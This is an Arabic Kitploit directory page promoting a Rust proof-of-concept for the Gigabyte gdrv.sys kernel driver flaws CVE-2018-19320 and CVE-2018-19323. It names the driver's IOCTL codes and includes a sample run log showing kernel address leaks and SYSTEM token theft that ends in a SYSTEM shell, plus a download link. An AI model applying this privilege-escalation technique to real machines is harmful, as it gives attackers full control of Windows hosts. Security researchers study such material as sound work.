Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-1932X — إثبات مفهوم Rust لثغرات برنامج تشغيل النواة CVE-2018-1932X | Kitploit
أدوات/GitHubGitHub/bkreisel/cve-2018-1932x
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالتطوير الحمولاتاستغلال الملفات الثنائية
GitHubbkreisel/cve-2018-1932x

CVE-2018-1932X

إثبات مفهوم Rust لثغرات برنامج تشغيل النواة CVE-2018-1932X

عرض المستودع
3منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-1932X (Rust Exploit POC) لـ GIGABYTE APP Center الإصدار v1.05.21 والإصدارات الأقدم

مجرد أن هدفك غير آمن في الذاكرة لا يعني أن استغلالك يجب أن يكون كذلك!

الثغرات المستخدمة:

  • CVE-2018-19320 - وظيفة مشابهة لـ memcpy في ring0
  • CVE-2018-19323 - قراءة وكتابة سجلات MSRs الخاصة بالآلة.

تم الاختبار على:

  • 20H1: Windows 10 Kernel Version 19041 MP (1 procs) Free x64

المراجع

  • مشروع Vergilius: هياكل النواة
  • إعلان التصحيح من Gigabyte
  • تفاصيل _KPCR

المتطلبات

  • x64 فقط
  • أرقام الإصدارات المختبرة أعلاه
  • تحميل برنامج تشغيل GIGABYTE: gdrv.sys

الاستخدام

.\CVE-2018-1932X.exe

مثال

root@kitploit:~
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X

Opening Handle to Kernel Driver: \\.\GIO
Acquired Handle: 0xa8
Sending IOCTL: 0xc3502580 with 0x10 bytes of data
  [+] Leaked   _KPCR: ffffe48159d88000
  [*] Address  _KPCRB: ffffe48159d88020
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPRCB: ffffe48159d88180
  [*] Address  _KTHREAD: ffffe48159d88188
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KTHREAD: ffffb50b14d16080
  [*] Address  _KPROCESS: ffffb50b14d162a0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPROCESS: ffffb50b1507f080
  [*] Address  PID: ffffb50b1507f4c0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   PID: 2092
  [+] Known    PID: 2092
Walking Active Process Links...
  [*] Address  ActiveProcessLinks.Flink: ffffb50b1507f4c8 (PID: 82c)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: fffff8015561e060 (PID: 0)
  [*] Address  ActiveProcessLinks.Flink: fffff8015561e060 (PID: 0)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: ffffb50b100624c8 (PID: 4)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708cac8306e
  [+] System  Token: ffff9708c567b047
Borrowing SYSTEM Token...
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708c567b047
Spawning Process...
  [+] Spawned SYSTEM Process
Closing Handle to Kernel Driver: \\.\GIO

تشغيل Powershell:

root@kitploit:~
PS C:\> whoami
nt authority\system

الكتل القابلة للاستغلال

Memcpy (IOCTL 0x0C3502808)

Memcpy Code Blocks

MSR Manipulation (IOCTL 0x0C3502580)

MSR Code Blocks

تنزيل الأداة